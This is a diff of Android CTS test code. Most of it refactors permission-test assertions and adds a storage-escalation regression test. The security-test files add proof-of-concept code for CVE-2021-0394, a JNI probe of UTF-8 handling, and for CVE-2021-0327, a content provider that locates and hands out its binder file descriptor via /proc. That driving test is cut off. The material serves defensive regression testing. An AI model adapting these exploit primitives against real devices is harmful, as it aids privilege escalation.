+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="false"/>
+</manifest>
diff --git a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java
index 6077b21..a535bb0 100644
--- a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java
+++ b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java
@@ -30,7 +30,7 @@
import static com.android.compatibility.common.util.SystemUtil.eventually;
-import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
import static org.junit.Assert.assertNotEquals;
import static org.junit.Assert.assertNotNull;
@@ -126,8 +126,8 @@
install(APK_LOCATION_29v4);
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "foreground app-op").isEqualTo(MODE_FOREGROUND));
+ eventually(() -> assertWithMessage("foreground app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND));
}
/**
@@ -141,8 +141,8 @@
install(APK_LOCATION_BACKGROUND_29);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_IGNORED));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_IGNORED));
}
/**
@@ -157,8 +157,8 @@
sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_FOREGROUND));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND));
}
/**
@@ -174,8 +174,8 @@
sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_ALLOWED));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED));
}
/**
@@ -191,8 +191,8 @@
// Wait until the system sets the app-op automatically
// Fine location uses background location to limit access
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_FOREGROUND));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND));
}
/**
@@ -208,8 +208,8 @@
sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_ALLOWED));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED));
}
/**
@@ -225,8 +225,8 @@
sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_FOREGROUND));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND));
}
/**
@@ -244,7 +244,7 @@
sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION);
// Wait until the system sets the app-op automatically
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named(
- "loc app-op").isEqualTo(MODE_ALLOWED));
+ eventually(() -> assertWithMessage("loc app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED));
}
}
diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
index b53bf6a..5db94c1 100644
--- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
+++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
@@ -18,10 +18,8 @@
import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION;
import static android.Manifest.permission.ACCESS_COARSE_LOCATION;
-import static android.Manifest.permission.ACCESS_MEDIA_LOCATION;
import static android.Manifest.permission.READ_CALL_LOG;
import static android.Manifest.permission.READ_CONTACTS;
-import static android.Manifest.permission.READ_EXTERNAL_STORAGE;
import static android.app.AppOpsManager.MODE_FOREGROUND;
import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED;
import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET;
@@ -37,6 +35,7 @@
import static com.android.compatibility.common.util.SystemUtil.eventually;
import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
import static org.junit.Assert.assertEquals;
@@ -118,7 +117,8 @@
* @param permName The permission that needs to be granted
*/
private void assertPermissionGranted(@NonNull String permName) throws Exception {
- eventually(() -> assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isTrue());
+ eventually(() -> assertWithMessage(permName + " is granted").that(
+ isGranted(APP_PKG, permName)).isTrue());
}
/**
@@ -127,7 +127,7 @@
* @param permName The permission that should not be granted
*/
private void assertPermissionRevoked(@NonNull String permName) throws Exception {
- assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isFalse();
+ assertWithMessage(permName + " is granted").that(isGranted(APP_PKG, permName)).isFalse();
}
/**
@@ -268,22 +268,6 @@
* If a permission was granted before the split happens, the new permission should inherit the
* granted state.
*
- * This is a duplicate of {@link #inheritGrantedPermissionState} but for the storage permission
- */
- @Test
- public void inheritGrantedPermissionStateStorage() throws Exception {
- install(APK_STORAGE_29);
- grantPermission(APP_PKG, READ_EXTERNAL_STORAGE);
-
- install(APK_STORAGE_28);
-
- assertPermissionGranted(ACCESS_MEDIA_LOCATION);
- }
-
- /**
- * If a permission was granted before the split happens, the new permission should inherit the
- * granted state.
- *
* <p>App using a shared uid
*/
@Test
@@ -477,8 +461,8 @@
install(APK_LOCATION_BACKGROUND_29);
- eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named("foreground app-op")
- .isEqualTo(MODE_FOREGROUND));
+ eventually(() -> assertWithMessage("foreground app-op").that(
+ getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND));
}
/**
diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
new file mode 100644
index 0000000..3e302a9
--- /dev/null
+++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.permission.cts
+
+import android.Manifest.permission.ACCESS_MEDIA_LOCATION
+import android.Manifest.permission.READ_EXTERNAL_STORAGE
+import android.Manifest.permission.WRITE_EXTERNAL_STORAGE
+import android.app.Instrumentation
+import android.app.UiAutomation
+import android.content.Context
+import android.content.pm.PackageManager
+import androidx.test.platform.app.InstrumentationRegistry
+import com.android.compatibility.common.util.SystemUtil
+import org.junit.After
+import org.junit.Assert
+import org.junit.Before
+import org.junit.Test
+
+class StorageEscalationTest {
+ companion object {
+ private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions"
+ const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk"
+ const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk"
+ const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk"
+ const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation"
+ const val DELAY_TIME_MS: Long = 200
+ val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE,
+ ACCESS_MEDIA_LOCATION)
+ }
+
+ private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation()
+ private val context: Context = instrumentation.context
+ private val uiAutomation: UiAutomation = instrumentation.uiAutomation
+
+ @Before
+ @After
+ fun uninstallApp() {
+ SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME")
+ }
+
+ private fun installPackage(apk: String) {
+ SystemUtil.runShellCommand("pm install -r $apk")
+ }
+
+ private fun grantStoragePermissions() {
+ for (permName in permissions) {
+ uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName)
+ }
+ }
+
+ private fun assertStoragePermissionState(granted: Boolean) {
+ for (permName in permissions) {
+ Assert.assertEquals(granted, context.packageManager.checkPermission(permName,
+ APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED)
+ }
+ }
+
+ @Test
+ fun testCannotEscalateWithSdkDowngrade() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28)
+ }
+
+ @Test
+ fun testCannotEscalateWithNewManifestLegacyRequest() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL)
+ }
+
+ private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) {
+ installPackage(startPackageApk)
+ grantStoragePermissions()
+ assertStoragePermissionState(granted = true)
+ installPackage(finishPackageApk)
+ // permission revoke is async, so wait a short period
+ Thread.sleep(DELAY_TIME_MS)
+ assertStoragePermissionState(granted = false)
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java
index 1140cfb..bb48193 100644
--- a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java
+++ b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java
@@ -20,7 +20,7 @@
import static android.content.pm.PermissionInfo.PROTECTION_MASK_BASE;
import static android.os.Build.VERSION.SECURITY_PATCH;
-import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
import android.content.Context;
import android.content.pm.PackageInfo;
@@ -235,7 +235,7 @@
}
// Fail on any offending item
- assertThat(offendingList).named("list of offending permissions").isEmpty();
+ assertWithMessage("list of offending permissions").that(offendingList).isEmpty();
}
private List<ExpectedPermissionInfo> loadExpectedPermissions(int resourceId) throws Exception {
diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java
index b44cfcb..11e6121 100644
--- a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java
+++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java
@@ -26,6 +26,7 @@
import static com.android.compatibility.common.util.SystemUtil.runShellCommand;
import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
import static org.junit.Assert.fail;
@@ -490,7 +491,7 @@
private void assertRestrictedPermissionWhitelisted(
@NonNull Set<String> expectedWhitelistedPermissions) throws Exception {
final PackageManager packageManager = getContext().getPackageManager();
- eventually(() -> runWithShellPermissionIdentity(() -> {
+ eventually(() -> runWithShellPermissionIdentity(() -> {
final AppOpsManager appOpsManager = getContext().getSystemService(AppOpsManager.class);
final PackageInfo packageInfo = packageManager.getPackageInfo(PKG,
PackageManager.GET_PERMISSIONS);
@@ -502,7 +503,7 @@
| PackageManager.FLAG_PERMISSION_WHITELIST_UPGRADE);
assertThat(whitelistedPermissions).isNotNull();
- assertThat(whitelistedPermissions).named("Whitelisted permissions")
+ assertWithMessage("Whitelisted permissions").that(whitelistedPermissions)
.containsExactlyElementsIn(expectedWhitelistedPermissions);
// Also assert that apps ops are properly set
@@ -540,8 +541,8 @@
}
}
- assertThat(appOpsManager.unsafeCheckOpRawNoThrow(op,
- packageInfo.applicationInfo.uid, PKG)).named(op).isIn(possibleModes);
+ assertWithMessage(op).that(appOpsManager.unsafeCheckOpRawNoThrow(op,
+ packageInfo.applicationInfo.uid, PKG)).isIn(possibleModes);
}
}));
}
diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java
index 044abe2..5fb56e8 100644
--- a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java
+++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java
@@ -28,7 +28,7 @@
import static com.android.compatibility.common.util.SystemUtil.runShellCommand;
import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
-import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
import static java.lang.Integer.min;
@@ -99,8 +99,8 @@
* @param expectGranted {@code true} if the permission is expected to be granted
*/
void assertStoragePermGranted(boolean expectGranted) {
- eventually(() -> assertThat(isGranted(mPkg, READ_EXTERNAL_STORAGE)).named(
- this + " read storage granted").isEqualTo(expectGranted));
+ eventually(() -> assertWithMessage(this + " read storage granted").that(
+ isGranted(mPkg, READ_EXTERNAL_STORAGE)).isEqualTo(expectGranted));
}
/**
@@ -112,11 +112,13 @@
eventually(() -> runWithShellPermissionIdentity(() -> {
int uid = sContext.getPackageManager().getPackageUid(mPkg, 0);
if (expectHasNotIsolatedStorage) {
- assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid,
- mPkg)).named(this + " legacy storage mode").isEqualTo(MODE_ALLOWED);
+ assertWithMessage(this + " legacy storage mode").that(
+ sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid,
+ mPkg)).isEqualTo(MODE_ALLOWED);
} else {
- assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid,
- mPkg)).named(this + " legacy storage mode").isNotEqualTo(MODE_ALLOWED);
+ assertWithMessage(this + " legacy storage mode").that(
+ sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid,
+ mPkg)).isNotEqualTo(MODE_ALLOWED);
}
}));
}
diff --git a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt
index 26c6cc8..c54a96c 100644
--- a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt
+++ b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt
@@ -56,6 +56,7 @@
import androidx.test.platform.app.InstrumentationRegistry
import androidx.test.runner.AndroidJUnit4
import com.google.common.truth.Truth.assertThat
+import com.google.common.truth.Truth.assertWithMessage
import org.junit.Test
import org.junit.runner.RunWith
@@ -75,14 +76,14 @@
platformRuntimePerms.filter { !platformBgPermNames.contains(it.name) }
for (perm in platformFgPerms) {
- assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull()
+ assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull()
}
}
@Test
fun groupOfRuntimePermissionsShouldBeUnknown() {
for (perm in platformRuntimePerms) {
- assertThat(perm.group).named("Group of ${perm.name}").isEqualTo(UNDEFINED)
+ assertWithMessage("Group of ${perm.name}").that(perm.group).isEqualTo(UNDEFINED)
}
}
@@ -96,7 +97,7 @@
}
for (perm in platformAppOpPerms) {
- assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull()
+ assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull()
}
}
@@ -109,7 +110,7 @@
platformRuntimePerms.filter { platformBgPermNames.contains(it.name) }
for (perm in platformBgPerms) {
- assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNull()
+ assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNull()
}
}
diff --git a/tests/tests/role/Android.bp b/tests/tests/role/Android.bp
index bb35032..c3545b7 100644
--- a/tests/tests/role/Android.bp
+++ b/tests/tests/role/Android.bp
@@ -32,7 +32,7 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-permission",
],
data: [
diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp
index e82f2e1..743ea88 100644
--- a/tests/tests/security/Android.bp
+++ b/tests/tests/security/Android.bp
@@ -54,6 +54,7 @@
"src/**/*.java",
"src/android/security/cts/activity/ISecureRandomService.aidl",
"aidl/android/security/cts/IIsolatedService.aidl",
+ "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl",
],
//sdk_version: "current",
platform_apis: true,
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index a8cf61a..31f4c59 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -121,6 +121,52 @@
</intent-filter>
</activity>
+ <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.TestActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity">
+ <intent-filter>
+ <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" />
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <receiver
+ android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN">
+ <meta-data
+ android:name="android.app.device_admin"
+ android:resource="@xml/device_admin" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+
+ <provider
+ android:name="android.security.cts.CVE_2021_0327.BadProvider"
+ android:authorities="android.security.cts.CVE_2021_0327.BadProvider"
+ android:exported="false"
+ android:grantUriPermissions="true"
+ android:process=":badprovider" />
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml
index a7d1ede..11a4298 100644
--- a/tests/tests/security/AndroidTest.xml
+++ b/tests/tests/security/AndroidTest.xml
@@ -33,6 +33,16 @@
value="appops reset android.security.cts" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm remove-user 10" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm uninstall --user 0 android.security.cts" />
+ </target_preparer>
+
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.security.cts" />
<option name="runtime-hint" value="1h40m18s" />
diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
new file mode 100644
index 0000000..e71f2c8
--- /dev/null
+++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
@@ -0,0 +1,10 @@
+// IBadProvider.aidl
+package android.security.cts.CVE_2021_0327;
+
+// Declare any non-default types here with import statements
+import android.os.ParcelFileDescriptor;
+interface IBadProvider {
+ ParcelFileDescriptor takeBinder();
+
+ oneway void exit();
+}
diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp
index b667f18..60f9348 100644
--- a/tests/tests/security/jni/Android.bp
+++ b/tests/tests/security/jni/Android.bp
@@ -20,6 +20,7 @@
"android_security_cts_NativeCodeTest.cpp",
"android_security_cts_MMapExecutableTest.cpp",
"android_security_cts_EncryptionTest.cpp",
+ "android_security_cts_cve_2021_0394.cpp",
],
shared_libs: [
"libcrypto",
diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
index 7490d1a..06e57f1 100644
--- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
+++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
@@ -22,6 +22,7 @@
extern int register_android_security_cts_SeccompTest(JNIEnv*);
extern int register_android_security_cts_MMapExecutableTest(JNIEnv* env);
extern int register_android_security_cts_EncryptionTest(JNIEnv* env);
+extern int register_android_security_cts_cve_2021_0394(JNIEnv* env);
jint JNI_OnLoad(JavaVM *vm, void *) {
JNIEnv *env = NULL;
@@ -46,5 +47,9 @@
return JNI_ERR;
}
+ if (register_android_security_cts_cve_2021_0394(env)) {
+ return JNI_ERR;
+ }
+
return JNI_VERSION_1_4;
}
diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
new file mode 100644
index 0000000..66b5792
--- /dev/null
+++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <string.h>
+
+static constexpr char kDefaultValue = 'x';
+static constexpr size_t kStringLength = 4096;
+
+jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) {
+ (void) thiz;
+ char array[kStringLength];
+ memset(array, kDefaultValue, kStringLength - 1);
+ array[kStringLength - 1] = 0;
+ jstring s = env->NewStringUTF(array);
+ jboolean isVulnerable = false;
+ char invalidChars[] = { '\xc0', '\xe0', '\xf0' };
+ for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) {
+ char invalid = invalidChars[c];
+ array[kStringLength - 2] = invalid;
+ s = env->NewStringUTF(array);
+ const char* UTFChars = env->GetStringUTFChars(s, nullptr);
+ if (UTFChars[kStringLength - 2] != '?') {
+ isVulnerable = true;
+ }
+ env->ReleaseStringUTFChars(s, UTFChars);
+ }
+ return isVulnerable;
+}
+
+static JNINativeMethod gMethods[] = { { "poc", "()Z",
+ (void*) android_security_cts_cve_2021_0394_poc }, };
+
+int register_android_security_cts_cve_2021_0394(JNIEnv* env) {
+ jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394");
+ return env->RegisterNatives(clazz, gMethods,
+ sizeof(gMethods) / sizeof(JNINativeMethod));
+}
diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts
new file mode 100644
index 0000000..5365625
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_13925.ts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts
new file mode 100644
index 0000000..4952466
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2245.ts
Binary files differ
diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml
new file mode 100644
index 0000000..5760898
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin.xml
@@ -0,0 +1,14 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<device-admin>
+ <uses-policies>
+<!-- <limit-password/>-->
+<!-- <watch-login/>-->
+<!-- <reset-password/>-->
+<!-- <force-lock/>-->
+<!-- <wipe-data/>-->
+<!-- <expire-password/>-->
+<!-- <encrypted-storage/>-->
+<!-- <disable-camera/>-->
+<!-- <disable-keyguard-features/>-->
+ </uses-policies>
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
new file mode 100644
index 0000000..d0b6cad
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
@@ -0,0 +1,76 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.Bundle;
+import android.os.ParcelFileDescriptor;
+import android.os.Process;
+import android.os.RemoteException;
+import android.system.ErrnoException;
+import android.system.Os;
+
+import java.io.IOException;
+
+public class BadProvider extends ContentProvider {
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public Bundle call(String method, String arg, Bundle extras) {
+ if ("get_aidl".equals(method)) {
+ Bundle bundle = new Bundle();
+ bundle.putBinder("a", new IBadProvider.Stub() {
+ @Override
+ public ParcelFileDescriptor takeBinder() throws RemoteException {
+ for (int i = 0; i < 100; i++) {
+ try {
+ String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i);
+ // Log.v("TAKEBINDER", "fd=" + i + " path=" + name);
+ if (name.startsWith("/dev/") && name.endsWith("/binder")) {
+ return ParcelFileDescriptor.fromFd(i);
+ }
+ } catch (ErrnoException | IOException e) {
+ }
+ }
+ return null;
+ }
+
+ @Override
+ public void exit() throws RemoteException {
+ System.exit(0);
+ }
+ });
+ return bundle;
+ }
+ return super.call(method, arg, extras);
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return null;
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
new file mode 100644
index 0000000..56408ee
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.InstrumentationRegistry;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0327 {
+
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String TAG = "CVE_2021_0327";
+ public static boolean testActivityRequested;
+ public static boolean testActivityCreated;
+ public static String errorMessage = null;
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
